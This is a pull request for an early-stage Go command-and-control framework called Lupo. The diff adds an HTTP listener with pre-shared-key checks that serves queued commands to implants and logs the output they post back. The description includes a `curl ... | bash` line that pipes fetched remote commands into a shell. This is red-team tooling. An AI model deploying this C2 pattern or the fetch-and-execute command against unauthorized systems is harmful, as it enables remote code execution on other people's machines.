### PR TITLE
Dev/http listener implementation

### DIFF
--- a/cmd/interact.go
+++ b/cmd/interact.go
@@ -1,6 +1,7 @@
 package cmd
 
 import (
+	"github.com/InjectionSoftwareandSecurityLLC/lupo/server"
 	"github.com/desertbit/grumble"
 )
 
@@ -12,9 +13,13 @@ func init() {
 		LongHelp: "Interact with an available session by specifying the Session ID",
 		Args: func(a *grumble.Args) {
 			a.String("id", "Session ID to interact with")
+			a.String("cmd", "temporary inline cmd execution for proof of concept until sessions are implemented")
 		},
 		Run: func(c *grumble.Context) error {
 			println(c.Args.String("id"))
+
+			server.CMD = c.Args.String("cmd")
+
 			return nil
 		},
 	}

--- a/cmd/listener.go
+++ b/cmd/listener.go
@@ -8,6 +8,7 @@ import (
 	"strings"
 	"text/tabwriter"
 
+	"github.com/InjectionSoftwareandSecurityLLC/lupo/server"
 	"github.com/desertbit/grumble"
 	"github.com/fatih/color"
 )
@@ -16,6 +17,8 @@ import (
 var errorColorUnderline = color.New(color.FgRed).Add(color.Underline)
 var errorColorBold = color.New(color.FgRed).Add(color.Bold)
 var successColorBold = color.New(color.FgGreen).Add(color.Bold)
+
+var psk string
 
 // Listener - defines a listener structure
 type Listener struct {
@@ -53,8 +56,9 @@ func init() {
 			lport := c.Flags.Int("lport")
 			protocol := c.Flags.String("protocol")
 			listenString := lhost + ":" + strconv.Itoa(lport)
+			psk := c.Flags.String("psk")
 
-			startListener(listenerID, lhost, lport, protocol, listenString)
+			startListener(listenerID, lhost, lport, protocol, listenString, psk)
 
 			listenerID++
 
@@ -111,9 +115,11 @@ func init() {
 }
 
 // startListener - Creates a listener
-func startListener(id int, lhost string, lport int, protocol string, listenString string) {
+func startListener(id int, lhost string, lport int, protocol string, listenString string, psk string) {
 
-	httpServer := &http.Server{Addr: listenString}
+	server.PSK = psk
+
+	httpServer := &http.Server{Addr: listenString, Handler: http.HandlerFunc(server.HTTPServerHandler)}
 
 	newListener := Listener{
 		id:       id,

--- a/cmd/lupo.go
+++ b/cmd/lupo.go
@@ -5,6 +5,7 @@ import (
 	"github.com/fatih/color"
 )
 
+// App - Primary lupo grumble CLI construction
 var App = grumble.New(&grumble.Config{
 	Name:                  "lupo",
 	Description:           "Lupo Modular C2",
@@ -14,6 +15,9 @@ var App = grumble.New(&grumble.Config{
 	HelpHeadlineColor:     color.New(color.FgWhite),
 	HelpHeadlineUnderline: true,
 	HelpSubCommands:       true,
+	Flags: func(f *grumble.Flags) {
+		f.String("k", "psk", "wolfpack", "Pre-Shared Key for implant authentication")
+	},
 })
 
 func init() {

--- a/core/implants.go
+++ b/core/implants.go
@@ -1,0 +1,7 @@
+package core
+
+type implant struct {
+	id      int
+	arch    string
+	command string
+}

--- a/core/sessions.go
+++ b/core/sessions.go
@@ -1,0 +1,9 @@
+package core
+
+type session struct {
+	id      int
+	implant implant
+	rhost   string
+	checkin string
+	status  string
+}

--- a/main.go
+++ b/main.go
@@ -1,11 +1,11 @@
 package main
 
 import (
-	"./cmd"
-
+	"github.com/InjectionSoftwareandSecurityLLC/lupo/cmd"
 	"github.com/desertbit/grumble"
 )
 
 func main() {
+
 	grumble.Main(cmd.App)
 }

--- a/server/http.go
+++ b/server/http.go
@@ -1,0 +1,63 @@
+package server
+
+import (
+	"fmt"
+	"io/ioutil"
+	"log"
+	"net/http"
+
+	"github.com/fatih/color"
+)
+
+// Define custom colors for text output
+var errorColorUnderline = color.New(color.FgRed).Add(color.Underline)
+var errorColorBold = color.New(color.FgRed).Add(color.Bold)
+var successColorBold = color.New(color.FgGreen).Add(color.Bold)
+
+// PSK - Pre-shared key for implant authentication
+var PSK string
+
+// CMD - command string to be queued and executed, this is temporary until sessions are implemented
+var CMD string
+
+// HTTPServerHandler - Handles HTTPServer requests
+func HTTPServerHandler(w http.ResponseWriter, r *http.Request) {
+
+	//path := r.URL.Path[1:]
+
+	getParams := r.URL.Query()
+	var getPSK string
+
+	if len(getParams["psk"]) > 0 {
+		getPSK = getParams["psk"][0]
+	} else {
+		errorColorBold.Println("GET Request: Implant Did Not Provide PSK")
+		return
+	}
+
+	if getPSK == PSK {
+
+		body, err := ioutil.ReadAll(r.Body)
+		if err != nil {
+			log.Println(err)
+		}
+
+		data := string(body)
+
+		switch r.Method {
+		case "GET":
+			//log.Println("GET: " + path)
+			fmt.Fprintf(w, "%s", CMD)
+
+		case "POST":
+			if data != "" {
+				log.Println("POST: " + data)
+				fmt.Fprintf(w, "%s", data)
+			}
+		default:
+			fmt.Println("Invalid Request Type")
+		}
+	} else {
+		errorColorBold.Println("Implant Failed PSK Check")
+	}
+}


### PR DESCRIPTION
Implements custom HTTP server handling. Currently features:
- GET request based PSK auth check
- Basic "Command and Control" via a mock `interact` command
    - To use start a listener then post a command with `interact <#> <command>` the "#" can be anything as this will later drop into an interactive prompt per session when sessions are implemented. For now this just posts a command that is served to any HTTP listener
    - Test with something like to get mock code  execution: `curl -s http://host:port/?psk=mypsk | bash` 
- Protoyped structs for sessions and implants in the new `core` directory
- Switched from static file reference to conform to best practice go standards for local imports